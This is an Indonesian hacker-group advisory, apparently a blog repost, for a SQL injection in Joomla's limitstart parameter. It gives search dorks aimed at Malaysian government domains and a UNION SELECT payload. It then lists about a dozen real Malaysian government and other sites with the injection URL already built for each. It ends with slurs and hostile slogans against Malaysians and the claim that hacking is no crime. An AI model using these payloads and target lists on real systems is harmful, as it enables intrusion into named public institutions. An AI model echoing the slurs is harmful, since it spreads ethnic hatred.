=============================
|| Joomla limitstart SQL injection vulnerability ||
- Author or Credit : H4x0r-x0x and Banksonk
- Homepage : ungu.com,balikita.net,indonesianhacker.com,lareosing.org
- Date : april 13, 2010
- Publis : april 15,2010
[ Information ]
[+] version : **x0x**
[+] Vulnerability : SQL injection
[+] Dork : allinurl:"/index.php?limitstart="
[+] Dork : allinurl:"gov.my/index.php?limitstart="
=============================
::::-||+ Vulnerable File example +||-::::
http://127.0.0.1/index.php?limitstart=[SQL]
[ Exploit Error]
-5+union+all+select+1--
[Example Demo vuln]
=====================================
http://www.1malaysia.com.my/index.php?limitstart=-5+union+all+select+1--
http://motour.gov.my/index.php?limitstart=-5+union+all+select+1--
http://www.pdc.gov.my/index.php?limitstart=-5+union+all+select+1--
http://www.penerangan.gov.my/index.php?limitstart=-5+union+all+select+1--
http://www.jpa.gov.my/index.php?limitstart=-5+union+all+select+1--
http://www.mpob.gov.my/index.php?limitstart=-5+union+all+select+1--
http://roy.kbs.gov.my/index.php?limitstart=-5+union+all+select+1--
http://www.insolvensi.gov.my/index.php?limitstart=-5+union+all+select+1--
http://www.mohr.gov.my/index.php?limitstart=-5+union+all+select+1--
http://www.nuclearmalaysia.gov.my/index.php?limitstart=-5+union+all+select+1--
http://www.jbg.gov.my/index.php?limitstart=-5+union+all+select+1--
http://www.akademisains.gov.my/index.php?limitstart=-5+union+all+select+1--
=====================================
[ tHx to All Member ]
[+] Indonesian Hacker Team
[+] Ungu.com
[+] Balikita.net
[+] Lareosing
[ NOTE ]
[+] Hacking n0tHing Crime
[+] Hacking Is art
[+] Fvck MalaySiAnjing
[ QUOTE ]
[+] Soekarno : Dengan ini saya menyatakan "GANYANG MALAYSIA"
[-] FvcK MalaySiAnjing !!!
=============================
1 komentar:
salut komandan
Posting Komentar